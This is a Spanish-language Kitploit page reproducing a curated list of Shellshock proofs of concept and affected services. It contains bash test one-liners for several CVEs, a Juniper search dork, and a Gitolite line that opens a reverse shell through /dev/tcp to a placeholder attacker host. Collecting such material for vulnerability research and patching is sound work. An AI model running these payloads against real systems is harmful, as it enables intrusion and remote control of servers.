Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
shellshocker-pocs — Colección de Pruebas de Concepto y Objetivos Potenciales para #ShellShocker | Kitploit
Herramientas/GitHubGitHub/mubix/shellshocker-pocs
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRecursos Curados
GitHubmubix/shellshocker-pocs

shellshocker-pocs

Colección de Pruebas de Concepto y Objetivos Potenciales para #ShellShocker

Ver Repositorio
8891905hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Shellshocker - Repositorio de código de prueba de concepto de "Shellshock"

Colección de Pruebas de Concepto y objetivos potenciales para #ShellShocker

Enlace de Wikipedia: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Por favor, envía un pull request si tienes más enlaces u otros recursos

Especulación: (posiblemente vulnerable, no confirmado)

  • XMPP(ejabberd)
  • Mailman - confirmado no vulnerable
  • MySQL
  • NFS
  • Bind9
  • Procmail ver
  • Exim ver
  • Búsqueda en Google de Juniperinurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • vía: https://twitter.com/notsosecure/status/516132301025984512
    • vía: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • Equipos Cisco
    • vía: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix parcheado aquí
  • Si conoces PoCs para cualquiera de estos, por favor envía un issue o pull request con un enlace.

    Línea de comandos (Linux, OSX y Windows vía Cygwin)

    • bashcheck - script para probar las últimas vulnerabilidades

    CVE-2014-6271

    • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

    CVE-2014-7169

    si es vulnerable, creará un archivo llamado echo en el directorio de trabajo actual con la fecha dentro

    • env X='() { (a)=>\' bash -c "echo date"; cat echo

    CVE-2014-7186

    • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

    CVE-2014-7187

    • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

    CVE-2014-6278

    • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
    • Información adicional: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

    CVE-2014-6277

    se producirá un fallo de segmentación (segfault) si es vulnerable

    • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
    • Discusión adicional en fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
    • Información adicional: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

    IBM z/OS -

    • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

    HTTP

    • Módulo de exploit de Metasploit - Inyección de código en la variable de entorno Bash de Apache mod_cgi (Shellshock)
    • Módulo de exploit de Metasploit - Inyección de código en la variable de entorno Bash en Advantech Switch (Shellshock)
    • Módulo de exploit de Metasploit - Inyección en la variable de entorno Bash de IPFire (Shellshock)
    • Contaminación de cabeceras HTTP por @irsdl - http://pastebin.com/QNkf7dYS
    • HTTP CGI-BIN - http://pastebin.com/166f8Rjx
    • cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
    • Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
    • F5 - https://twitter.com/securifybv/status/515035044294172673
      • https://twitter.com/securifybv/status/515035044294172673/photo/1
      • https://twitter.com/avalidnerd/status/515056463589675008
        • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
    • Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
    • Versión de línea de comandos - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
    • Guía paso a paso basada en User-Agent con LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
    • Guía paso a paso basada en User-Agent con Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
    • Basado en User-Agent pero compatible con Tor y Socks5 (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
    • Basado en User-Agent en Ruby - https://github.com/securusglobal/BadBash
    • Escáner simple basado en cabeceras que usa sleep con soporte de múltiples hilos - https://github.com/gry/shellshock-scanner
    • shocker - Comprueba una lista de URLs en un archivo, o una única URL, contra una lista de recursos CGI vulnerables conocidos (método Content-type)
    • Xymon - https://lists.xymon.com/archive/2014-September/040350.html
    • QNAP - https://www.exploit-db.com/exploits/36503

    Phusion Passenger

    • https://news.ycombinator.com/item?id=8369776

    DHCP

    • Explotación de TrustedSec mediante Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
    • Módulo de exploit de Metasploit - Inyección de la variable de entorno Bash en Dhclient (Shellshock)
    • Módulo auxiliar de Metasploit - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
    • Script en Perl - http://pastebin.com/S1WVzTv9
    • usando un Wi-Fi Pineapple para forzar a las personas a unirse a la red - http://d.uijn.nl/?p=32

    SSH

    • Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
    • SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
      • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
    • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
    • Gitolite - https://twitter.com/Grifo/status/515089986161766400
      • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
      • (es necesario tener una cuenta de git en el servidor)

    OSX

    • Escalada de privilegios mediante VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
    • Solución: http://support.apple.com/kb/DL1769

    OSX - con DNS inverso (CVE-2014-3671.txt)

    • Archivo de zona de ejemplo: in-addr.arpa que contiene un ejemplo del CVE-2014-6271.
    • Archivo de ejemplo con un getnameinfo() que pasa a setenv(): osx-rev-ptr.c
    • Aviso con descripción de lo anterior CVE-2014-3671.txt

    SIP

    • Proxies SIP: https://github.com/zaf/sipshock

    Qmail

    • Tutorial detallado - http://marc.info/?l=qmail&m=141183309314366&w=2
    • Tweet de @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392
      • http://twitpic.com/ec3615
      • http://twitpic.com/ec361o

    Postfix

    • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

    FTP

    • Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
    • Módulo de exploit de Metasploit - Inyección de código en la variable de entorno Bash en la autenticación externa de Pure-FTPd (Shellshock)

    OpenVPN

    • OpenVPN - https://news.ycombinator.com/item?id=8385332
    • Guía paso a paso de PoC por @fj33r - http://sprunge.us/BGjP

    Oracle

    • Alerta y lista de productos afectados

    TMNT

    • https://twitter.com/SynAckPwn/status/514961810320293888/photo/1

    Hand

    • Vía @DJManilaIce - http://pastie.org/9601055
    root@kitploit:~
    user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
    /bin/bash: X: line 1: syntax error near unexpected token `='
    /bin/bash: X: line 1: `'
    /bin/bash: error importing function definition for `X'
               __ __
              /  V  \ 
         _    |  |   |
        / \   |  |   |
        |  |  |  |   |
        |  |  |  |   |
        |  |__|  |   |
        |  |  \  |___|___
        |  \   |/        \ 
        |   |  |______    |
        |   |  |          |
        |   \__'   /     |
        \        \(     /
         \             /
          \|            |
    
    

    CUPS

    • Módulo de exploit de Metasploit - Inyección de código en la variable de entorno Bash en el filtro CUPS

    IRC

    • Módulo de exploit de Metasploit - Ejecución remota de código en bots de IRC Xdh / LinuxNet Perlbot / fBot
    • Módulo de exploit de Metasploit - Ejecución remota de código en el bot de IRC Legend Perl

    Scripts de @primalsec

    • shell_shocker.py - Bueno para interactuar con una URL vulnerable conocida y pasar comandos (método User-Agent)
    • w3af_shocker.py - Automatiza el proceso de ejecutar un escaneo de spider/shell_shock de w3af (método User-Agent)
    • shell_sprayer.py - Comprueba una lista de URLs en un archivo, o una única URL, contra una lista conocida de recursos cgi-bin (método User-Agent)
    Descargar herramienta